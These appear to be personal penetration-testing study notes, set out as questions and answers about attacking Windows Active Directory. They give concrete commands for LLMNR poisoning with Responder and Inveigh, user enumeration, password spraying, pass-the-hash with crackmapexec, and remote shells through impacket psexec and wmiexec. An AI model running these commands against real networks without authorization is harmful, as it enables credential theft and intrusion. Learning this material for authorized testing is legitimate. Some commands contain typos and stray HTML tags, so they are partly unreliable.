Windows Active Directories

Question 1

Identifying hosts:
how to identify hosts in a Linux attack box. list 4 methods (tools)

Answer 1

look for ARP, MDNS, DNS requests and see the IPs
1) sudo -E wireshark or tcp dump
2) responder -I tun0 -A (analyze mode for LLMNR, NBT-NS not covered by the others)
3)fping -asgq 172.16.5.0/23
4)nmap

Question 2

AD username enumeration with no creds from Linux.
what tools?

Answer 2

1) kerbrute userenum -d <domain> --dc <ip> jsmith.txt -o result_users
2)enum4linux -U <ip>
3) rpcclient -u "" -N <ip>
4) crackmapexec smb <ip> --users
5) ldapsearch
6)windapsearch</ip></ip></ip></ip></domain>

Question 3

LLMNR/NBT-NS poisoning with LINUX
which tool and which flags?

Answer 3

use responder -A (also try -w for wpad web proxy auto discover)

Question 4

LLMNR/NBT-NS Poisoning with WINDOWS
which tool?

Answer 4

use inveigh.exe
use esc for interactive mode
look for command get ntlmv2unique

Question 5

Enumerating password policies from linux (4 tools)

Answer 5

1)crackmapexec but you need the DC host with creds!
crackmapexec smb <ip> -u username -p password --pass-pol
2) rpcclient (SMB null sessions)
rpcclient -U "" -N <ip>
querydominfo, getdompwinfo
3)enum4linux -P <ip>
4)ldapsearch</ip></ip></ip>

Question 6

Enumerating password policies from windows (3 tools)

Answer 6

1)net use \host\ipc$ “” /u:”” (eg host= DC01)
or net use \DC01\ipc$ “password” /u:guest
2)net accounts
3)import-module PowerView.ps1
Get-DomainPolicy

Question 7

Password spray and hash from linux (3 tools)

Answer 7

1)for loop with rpcclient
2) kerbrute passwordpray -d domain –dc ip users_list “password”
3)sudo crackmapexec smb -u user_list -p Password
4) sudo crasckmapexec smb –local-auth ip_range -u admin -H hash

Question 8

Password spray from windows

Answer 8

domainpasswordspray.ps1
import-module DomainPasswordSpray.ps1
invoke-domainPasswordSpray -Password Welcome1 -Outfile file.txt -ErrorAction SilentlyContinue

Question 9

If we have AD creds, from Linux
1)enumerate users (3 tools)
2)logged on users
3)shares (2 tools)
4) single share

Answer 9

1)sudo crackmapexec smb ip -u .. -p .. –users
or
python3 windapsearch.py –dc-ip ip -u user@inlane.local -p .. -da (da=enumerate users) or –PU (enumerate privileged users)
or sudo bloodhound-python -u .. -p .. -ns ip -d domain -c all (creates zip file)
2)sudo crackmapexec smb ip -u .. -p .. –loggedon-users
3) sudo crackmapexec smb ip -u .. -p … –shares
or
smbmap -u .. -p .. -d domain-H <ip>
4) sudo crackmapexec smb ip -u .. -p ... --share share_name</ip>

Question 10

create a remote session with impacket and credentials (2 tools)

Answer 10

psexec.py inlanefreight.local/user:password@ip

wmiexec.py inlanefreight.local/user:password@ip

Question 10

Sharphound + bloodhound

Answer 10

sharphound.exe -c All -d domain (–ExcludeDCs)

Question 11

If we have AD creds from windows PS, check if i’m alone

Answer 11

import-module ActiveDirectory (check with get-module)
1) get-addomain
2) get-aduser (with SPN)
3)get-adtrust
4)get-adgroup
5)get-adgroupmember -identity user_name
6)qwinsta

Question 12

tool to get passw in AD from a local windows machine

Answer 12

snaffler.exe -d domain -s -v data

Question 13

In windows, check defenses

Answer 13

netsh advfirewall show all profiles (PS)
sc query windefend (CMD)

Question 14

windows, if i’m system user, how can enumerate from PS

Answer 14

dsqeury user (computer, …)